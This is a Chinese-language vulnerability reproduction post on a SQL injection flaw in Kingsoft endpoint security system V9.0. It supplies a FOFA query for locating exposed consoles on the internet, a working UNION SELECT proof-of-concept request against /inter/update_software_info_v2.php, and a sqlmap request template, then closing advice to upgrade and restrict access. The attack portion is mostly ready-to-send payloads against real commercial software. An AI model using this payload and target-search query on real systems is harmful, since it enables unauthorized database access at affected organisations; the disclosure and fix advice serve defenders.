金山终端安全系统V9.0 SQL注入漏洞复现

0x01 产品简介

金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。

0x02 漏洞概述

金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

0x03 影响范围

金山终端安全系统<V9.SP1.E1008

0x04 复现环境

FOFA:title=="用户登录-金山终端安全系统V9.0Web控制台"

0x05 漏洞复现

PoC

复制代码
POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

type=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=

查询当前用户

延时注入

Sqlmap验证

数据包放txt里面

复制代码
POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

type=-100*&key=&pageCount=0&curPage=

0x06 修复建议

升级修复方案

官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。https://www.ejinshan.net/lywz/index

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议,不要将集权设备的Web管理控制台开放在互联网上,并且仅允许可信IP进行访问。

相关推荐
旺旺的碎冰冰~20 分钟前
(七)安全规约回顾
安全
深盾安全30 分钟前
Linux 跨进程内存操作:三种实战方法与攻防思考
安全
Hilaku33 分钟前
为什么永远不要相信前端输入?绕过前端验证,只需一个 cURL 命令!
前端·javascript·安全
xing.yu.CTF1 小时前
ATT&CK实战系列--蓝队防御(五)
网络安全·渗透测试·应急响应·红蓝对抗·内网对抗
vortex52 小时前
渗透测试红队快速打点策略的思考
网络·安全·web安全
❥ღ Komo·2 小时前
K8s Secrets:敏感数据安全存储指南
安全·容器·kubernetes
眠晚晚2 小时前
云上攻防-Docker-堡垒机安全详解
安全·web安全·网络安全·docker·容器
小白|3 小时前
OpenHarmony + Flutter 混合开发深度实践:构建支持国密算法(SM2/SM3/SM4)与安全存储的金融级应用
算法·安全·flutter
zhaodiandiandian3 小时前
AI 伦理治理:为智能时代筑牢安全护栏
人工智能·安全
梦想是红队的咸鱼3 小时前
git泄露(一篇文章就够了)
git·web安全